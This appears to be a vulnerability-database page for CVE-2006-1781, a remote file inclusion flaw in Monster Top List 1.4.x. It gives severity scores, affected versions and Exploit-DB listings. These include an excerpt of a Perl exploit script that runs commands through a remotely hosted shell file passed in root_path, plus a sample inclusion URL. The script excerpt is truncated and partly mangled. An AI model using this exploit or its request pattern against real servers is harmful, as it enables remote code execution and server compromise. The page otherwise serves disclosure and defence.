CVE-2006-1781
published 2006-04-13CVE-2006-1781: PHP remote file inclusion vulnerability in functions.php in Circle R Monster Top List (MTL) 1.4 allows remote attackers to execute arbitrary PHP code via a URL…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.59%
94.9th percentile
PHP remote file inclusion vulnerability in functions.php in Circle R Monster Top List (MTL) 1.4 allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter. NOTE: It was later reported that 1.4.2 and earlier are affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| circle_r | monster_top_list | <= 1.4.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion
exploitdb·2007-03-20
CVE-2006-1781 Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion
Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion
---
#!/usr/bin/perl
#
# Monster Top List hTTp://RSTZONE.NET .\n";
print ". [c]oded by fluffy_bunny - [email protected] .\n";
print "...............................................................\n\n";
my $kw3,$path,$shell,$conexiune,$cmd,$data ;
if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];
chomp($shell);
$path = $path."/sources/functions.php";
sub usage(){
print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
print 'Shell : ';
}
while ()
{
print "[kw3rln].[rst] :~\$ ";
chomp($cmd=);
if ($cmd eq "exit") { exit(0);}
$kw3 = $path."?root_path=".$shell."?&cmd=".$cmd;
if ($cmd e
Exploit-DB
outgun 1.0.3 bot 2 - Multiple Vulnerabilities
exploitdb·2006-05-14
CVE-2006-2402 outgun 1.0.3 bot 2 - Multiple Vulnerabilities
outgun 1.0.3 bot 2 - Multiple Vulnerabilities
---
# Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1781.zip (05132006-outgunx.zip)
# milw0rm.com [2006-05-14]
Exploit-DB
Monster Top List 1.4 - 'functions.php' Remote File Inclusion
exploitdb·2006-04-17
CVE-2006-1781 Monster Top List 1.4 - 'functions.php' Remote File Inclusion
Monster Top List 1.4 - 'functions.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/17546/info
Monster Top List is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[path]/sources/functions.php?root_path=http://www.example.com/
No writeups or analysis indexed.
http://pridels0.blogspot.com/2006/04/monstertoplist.htmlhttp://secunia.com/advisories/19688http://www.osvdb.org/24650http://www.securityfocus.com/bid/17546http://www.securityfocus.com/bid/23074http://www.vupen.com/english/advisories/2006/1350https://exchange.xforce.ibmcloud.com/vulnerabilities/25774https://www.exploit-db.com/exploits/3530http://pridels0.blogspot.com/2006/04/monstertoplist.htmlhttp://secunia.com/advisories/19688http://www.osvdb.org/24650http://www.securityfocus.com/bid/17546http://www.securityfocus.com/bid/23074http://www.vupen.com/english/advisories/2006/1350https://exchange.xforce.ibmcloud.com/vulnerabilities/25774https://www.exploit-db.com/exploits/3530
2006-04-13
Published